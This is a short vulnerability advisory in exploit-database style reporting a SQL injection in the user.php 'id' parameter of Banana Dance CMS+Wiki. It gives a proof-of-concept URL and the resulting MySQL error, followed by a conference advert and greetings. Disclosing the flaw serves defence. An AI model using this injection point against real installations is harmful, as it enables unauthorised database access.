+-----------------------+| Banana Dance CMS+Wiki |+-----------------------+
Vulnerable Web-App : Banana Dance CMS+Wiki
Vulnerability: SQLi
Author : Aodrulez.
Email: f3arm3d3ar@gmail.com
Google-Dork::) Guess it.
Tested on: Ubuntu 10.04
Web-App: http://www.doyoubananadance.com/
Download Link: http://www.doyoubananadance.com/functions/dl.php?file=4e84e50f89bf7
+---------+| Details |+---------+1] SQLi
Exploit : http://localhost/user.php?id=1'[sqli]
Error:------
Invalid query:
SELECT `key`,`value` FROM `bd_user_data` WHERE `user_id`='1''
Error: You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the right
syntax to use near ''1''' at line 1+----------+|MalCon|+----------+(International Malware Conference)
The CFP for MalCon-2011is ON!
If you think you are good enough,try cracking our
'Capture the Mal Challenge-2011' online.
Open to everyone!
For more details, visit http://malcon.org
+-------------------+| Greetz Fly Out To |+-------------------+1] Amforked(): My Mentor.2] The Blue Genius : My Boss.3] str0ke (milw0rm)4] www.orchidseven.com
5] www.malcon.org
6] www.isac.org.in7] www.nsd.org.in8] LiquidWorm
+-------+| Quote |+-------+"Microsoft is not the answer. Microsoft is the question. NO is the answer."- Erik Naggum
